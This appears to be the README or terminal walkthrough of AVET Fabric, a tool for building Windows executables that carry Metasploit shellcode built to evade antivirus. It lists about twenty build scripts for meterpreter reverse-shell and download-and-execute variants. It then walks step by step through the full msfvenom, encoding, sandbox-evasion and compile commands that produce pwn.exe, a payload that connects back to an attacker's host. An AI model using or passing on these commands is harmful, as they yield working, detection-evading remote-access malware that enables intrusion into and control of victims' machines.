AVET Fabric by Daniel Sauder
avet_fabric.py is an assistant for building exe files with shellcode payloads for targeted attacks and antivirus evasion.
0: build_win32_meterpreter_rev_https_shikata_fopen.sh
1: build_win32_meterpreter_rev_https_fopen_shikata.sh
2: buildsvc_win32_meterpreter_bind_tcp_20xshikata.sh
3: build_win32_meterpreter_rev_https_50xshikata_quiet.sh
4: build_win32_meterpreter_rev_https_shikata_raw_loadfile.sh
5: build_win32_meterpreter_rev_https_ASCIIMSF_cmd.sh
6: build_win32_meterpreter_rev_https_shikata_downloadexecshellcode.sh
7: build_win32_shell_rev_tcp_shikata_fopen_kaspersky.sh
8: build_win32_meterpreter_rev_https_ASCIIMSF.sh
9: build_win32_meterpreter_rev_https_killswitch_shikata.sh
10: build_win32_meterpreter_rev_https_shikata_download_powershell_raw_loadfile.sh
11: build_win32_meterpreter_rev_https_shikata_load_ie_debug.sh
12: build_win32_meterpreter_rev_https_shikata_download_certutil_raw_loadfile.sh
13: build_win32_meterpreter_rev_https_50xshikata.sh
14: build_win32_meterpreter_rev_https_shikata_loadfile.sh
15: build_win32_meterpreter_unstaged_rev_https_40xshikata.sh
16: build_win32_meterpreter_rev_https_shikata_downloadexecshellcode_DKMC.sh
17: build_win32_meterpreter_rev_https_fopen_shikata_quiet.sh
18: build_win64_meterpreter_rev_tcp_xor.sh
19: build_win32_meterpreter_rev_https_shikata_load_ie.sh
20: build_win64_meterpreter_rev_tcp_xor_downloadexecshellcode.sh
21: build_win64_meterpreter_rev_tcp_xor_fopen.sh
Input number of the script you want use and hit enter: 0
Now you can edit the build script line by line.
simple example script for building the .exe file
include script containing the compiler var $win32_compiler
you can edit the compiler in build/global_win32.sh
or enter $win32_compiler="mycompiler" here
$ . build/global_win32.sh
import global default lhost and lport values from build/global_connect_config.sh
$ . build/global_connect_config.sh
override connect-back settings here, if necessary
$ LPORT=$GLOBAL_LPORT
$ LHOST=$GLOBAL_LHOST
make meterpreter reverse payload, encoded with shikata_ga_nai
additionaly to the avet encoder, further encoding should be used
$ msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > sc.txt
format the shellcode for make_avet
$ ./format.sh sc.txt > scclean.txt && rm sc.txt
call make_avet, the -f compiles the shellcode to the exe file, the -F is for the AV sandbox evasion
$ ./make_avet -f scclean.txt -F -E
compile to pwn.exe file
$ $win32_compiler -o pwn.exe avet.c
cleanup
$ rm scclean.txt && echo "" > defs.h
The following commands will be executed:
#/bin/bash
. build/global_win32.sh
. build/global_connect_config.sh
LPORT=$GLOBAL_LPORT
LHOST=$GLOBAL_LHOST
msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > sc.txt
./format.sh sc.txt > scclean.txt && rm sc.txt
./make_avet -f scclean.txt -F -E
$win32_compiler -o pwn.exe avet.c
rm scclean.txt && echo "" > defs.h
Press enter to continue.
Building the output file...
Please stand by...
The output file should be placed in the current directory.
Bye...